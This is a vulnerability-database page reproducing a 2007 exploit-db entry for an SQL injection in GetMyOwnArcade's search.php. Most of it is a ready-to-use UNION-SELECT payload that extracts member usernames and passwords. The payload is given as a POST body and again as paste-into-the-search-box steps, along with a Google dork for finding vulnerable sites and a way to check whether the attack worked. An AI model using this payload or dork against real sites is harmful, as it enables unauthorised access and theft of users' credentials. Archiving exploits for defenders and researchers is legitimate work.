Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

GetMyOwnArcade - 'search.php?query' SQL Injection

🗓️ 16 Aug 2007 00:00:00Reported by RoXur777Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 29 Views

'GetMyOwnArcade' search.php SQL Injection discovered by RoXur777 on August 11th 2007, allows obtaining member information using UNION-SELEC

Code
###############################################
### GetMyOwnArcade (search.php) ($query) SQL-Injection
###############################################
### Discovered By: RoXur777
### ***August 11th 2007
### Google-Dork: "Powered by GetMyOwnArcade"
###############################################
/*
* $query is not being filtered before getting passed to a query.
* Therefore, we can inject SQL code into the SQL-Query.
* Using UNION-SELECT we can obtain member information.
*/
###
##
#Straight-Forward:
#####################
### POST
### search.php
###"query=')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/*"
#####################
###
##
#
If you did not understand the Straight-Forward version of the exploit then read this:
###
#
1) Use the search function on a GetMyOwnAracde site. (They are not always visible on index.php)
2) In the search field type:
#
#######
')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/*
#######
#
3) Click Enter.
4) If exploitation was successful you should see usernames and passwords instead of the search results.
---
However if you see:
#
#######
Game search result for \')/**/union/**/.......
#######
#
That means that the exploit failed.
#

# milw0rm.com [2007-08-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Aug 2007 00:00Current
7.4High risk
Vulners AI Score7.4
getmyownarcadesql injectionroxur777august 11th 2007union-selectmember information
29